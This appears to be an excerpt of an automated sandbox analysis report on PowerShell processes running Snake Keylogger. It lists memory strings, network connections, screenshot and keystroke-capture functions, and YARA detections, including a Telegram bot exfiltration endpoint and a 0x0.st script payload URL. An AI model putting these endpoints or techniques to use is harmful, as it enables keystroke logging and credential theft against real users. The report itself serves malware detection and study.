                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2793833295.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: powershell.exe, 00000016.00000002.2806054422.00000000080D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/F
                  Source: powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/SF
                  Source: powershell.exe, 0000001E.00000002.2809296079.000000000814A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/U
                  Source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                  Source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/mhC
                  Source: powershell.exe, 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: powershell.exe, 0000001E.00000002.2809296079.00000000081B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/xC
                  Source: powershell.exe, 0000000D.00000002.3706712881.0000000007600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008474000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2727828082.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2743365058.0000000002FE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2829344708.0000000003035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 0000001E.00000002.2807890146.00000000080B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                  Source: powershell.exe, 00000016.00000002.2806054422.0000000008008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microZM
                  Source: powershell.exe, 0000001E.00000002.2809296079.0000000008115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 00000016.00000002.2783605754.0000000007226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftBN
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3706712881.0000000007660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.00000000059B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.privateemail.com
                  Source: powershell.exe, 0000000D.00000002.3581168810.000000000498F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/r
                  Source: powershell.exe, 0000000D.00000002.3581168810.000000000498F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.micrph
                  Source: powershell.exe, 00000004.00000002.2277973567.000001291007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2256554040.0000012901A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2277973567.00000129101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 0000000D.00000002.3706712881.0000000007600000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3706712881.0000000007660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.00000000059B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000004.00000002.2256554040.0000012900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129017A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000D.00000002.3581168810.000000000498F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or22
                  Source: powershell.exe, 00000016.00000002.2732319996.0000000004C47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
                  Source: powershell.exe, 0000002B.00000002.2852080369.0000000005156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8-5S.ps1
                  Source: powershell.exe, 00000004.00000002.2256554040.0000012900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005136000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2732319996.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2750694858.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2852080369.0000000005010000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBcq
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: powershell.exe, 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000004.00000002.2256554040.0000012900DF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000004.00000002.2277973567.000001291007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2256554040.0000012901A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2277973567.00000129101B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3635023745.000000000619B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129017A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000004.00000002.2256554040.00000129017A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2828264055.00000000096F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000016.00000002.2757820569.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A39A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2829296591.000000000A338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A5FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2835678297.000000000A663000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2774533305.0000000005F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: powershell.exe, 0000000D.00000002.3585975750.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.0000000005936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000A6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008524000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000084EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3706712881.0000000007660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.00000000083F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3750385348.000000000AC74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3719703937.0000000008566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3570656221.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3585975750.00000000059B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49881 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:49941 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50007 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50021 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50026 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50035 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50045 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50052 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50056 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50061 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50065 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50069 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50071 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50076 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50079 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50085 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50086 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50089 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50090 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:50093 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.5:50095 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: amsi32_1276.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7628.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_8000.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_4696.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7892.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7044.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_7564.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_5044.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: amsi32_5332.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: 30.2.powershell.exe.a64805c.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a119c0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f34290.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60f8b88.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 30.2.powershell.exe.a64805c.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60d0b68.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.96f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5c92f18.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5c92f18.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.a380b24.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.a1538b4.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f34290.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f5c2b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 79.2.powershell.exe.a1538b4.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 30.2.powershell.exe.5f5c2b0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.96f0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.a72a22c.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 79.2.powershell.exe.5a399e0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60f8b88.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.powershell.exe.5ce0820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 59.2.powershell.exe.a72a22c.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 59.2.powershell.exe.60d0b68.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
